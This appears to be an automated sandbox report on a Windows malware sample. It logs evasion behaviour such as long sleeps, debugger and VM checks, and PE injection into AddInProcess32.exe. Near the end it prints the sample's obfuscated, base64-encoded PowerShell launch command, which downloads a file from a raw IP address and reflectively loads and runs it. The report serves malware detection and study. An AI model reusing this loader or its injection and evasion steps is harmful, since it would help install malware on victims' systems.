Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0040E54F Sleep,ExitProcess,

15_2_0040E54F

Contains functionality to enumerate running services

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

15_2_004198C2

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2065	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 830	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5149	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4584	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2754	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1805	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 2364	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 7226	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: foregroundWindowGot 1770	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016	Thread sleep count: 5149 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216	Thread sleep count: 4584 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep count: 2754 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep count: 1805 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7560	Thread sleep count: 171 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7560	Thread sleep time: -85500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564	Thread sleep count: 2364 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564	Thread sleep time: -7092000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564	Thread sleep count: 7226 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564	Thread sleep time: -21678000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\PING.EXE

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	15_2_0041B42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0044D5E9 FindFirstFileExA,	15_2_0044D5E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	15_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,	15_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	15_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00418C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	15_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp,
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: powershell.exe, 00000007.00000002.1513412775.0000025F2893F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 0000000C.00000002.1349503253.000001B92B449000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

15_2_0043A65D

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00442554 mov eax, dword ptr fs:[00000030h]

15_2_00442554

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0044E92E GetProcessHeap,

15_2_0044E92E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00434168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0043A65D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00433B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00433CD7 SetUnhandledExceptionFilter,	15_2_00433CD7

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ;			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 457000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 470000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 476000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47B000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FF0008	Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

15_2_00410F36

Contains functionality to simulate mouse events

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00418754 mouse_event,

15_2_00418754

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F